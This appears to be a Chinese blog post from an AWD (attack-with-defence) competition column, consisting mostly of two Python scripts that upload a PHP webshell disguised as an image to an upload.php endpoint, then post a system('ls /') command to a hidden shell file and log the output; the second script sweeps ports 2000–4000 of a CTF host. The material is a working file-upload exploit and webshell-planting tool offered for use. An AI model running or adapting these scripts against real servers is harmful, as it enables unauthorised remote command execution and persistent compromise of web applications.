文件上传自动攻击脚本

蕾米莉亚《'';

已于 2025-01-08 14:20:13 修改

阅读量92

点赞数 4

分类专栏： awd脚本文章标签： python 安全

于 2025-01-08 13:51:05 首次发布

本文链接：https://blog.youkuaiyun.com/2301_80867077/article/details/145006559

版权

awd脚本专栏收录该内容

6 篇文章

订阅专栏

虽然但是，~~不会真的有人不看代码直接用吧。~~ ，记得改里面的东西，尤其是18行的判定，这个你可以改为其他的上传成功的回显

import requests

payload=[]
base_url = 'http://node4.anna.nssctf.cn:28238'
url = f'{base_url}/upload.php'
headers = {
    'Host': base_url.split('/')[-1],
    'Content - Type':'multipart/form - data; boundary = ---------------------------157018622732421602881779552500',
    'Origin': base_url,
    'Connection': 'close'
}
try:
    with open(r"C:\Users\OMEN\Desktop\code\一句话\nodie2.php", 'rb') as f:
        file_content = f.read()
    files = {
        'uploaded': ('2.phtml', file_content, 'image/jpeg')
    }
    response = requests.post(url, headers = headers, files = files)
    if'succes' not in response.text:
        print('未找到success，程序退出')
        exit()
    payload.append(url)
    print('Upload response - ', response.text)
    try:
        response = requests.get(f'{base_url}/upload/2.phtml', timeout = 1)
    except requests.RequestException:
        url2 = f'{base_url}/upload/.test1.php'
        data = {
            'cmd':'system("ls /");'
        }
        response = requests.post(url2, data = data)
        print('Second request response - ', response.text)
        with open('payload.txt', 'a') as file:
            file.write(response.text + '\n')
            print("写入成功！！")
        with open('url.txt','a') as file:
            for url in payload:
                file.write(url+'\n')
except FileNotFoundError:
    print('本地文件未找到')
except requests.RequestException as e:
    print('请求错误: ', e)

import requests


for port in range(2000, 4001):
    base_url = f'http://node4.anna.nssctf.cn:{port}'
    url = f'{base_url}/upload.php'
    headers = {
        'Host': base_url.split('/')[-1],
        'Content - Type':'multipart/form - data; boundary = ---------------------------157018622732421602881779552500',
        'Origin': base_url,
        'Connection': 'close'
    }
    try:
        with open(r"C:\Users\OMEN\Desktop\code\一句话\nodie2.php", 'rb') as f:
            file_content = f.read()
        files = {
            'uploaded': ('2.phtml', file_content, 'image/jpeg')
        }
        response = requests.post(url, headers = headers, files = files)
        if'success' not in response.text:
            print(f'Port {port}: 未找到success，进入下一个循环')
            continue
        payload = [url]
        print(f'Port {port}: Upload response - {response.text}')
        try:
            response = requests.get(f'{base_url}/upload/2.phtml', timeout = 1)
        except requests.RequestException:
            url2 = f'{base_url}/upload/.test1.php'
            data = {
                'cmd':'system("ls /");'
            }
            response = requests.post(url2, data = data)
            print(f'Port {port}: Second request response - {response.text}')
            with open('payload.txt', 'a') as file:
                file.write(f'Port {port}: {response.text}\n')
            with open('url.txt', 'a') as file:
                for url in payload:
                    file.write(url + '\n')
    except FileNotFoundError:
        print('本地文件未找到')
        break
    except requests.RequestException as e:
        print(f'Port {port} 请求错误: {e}')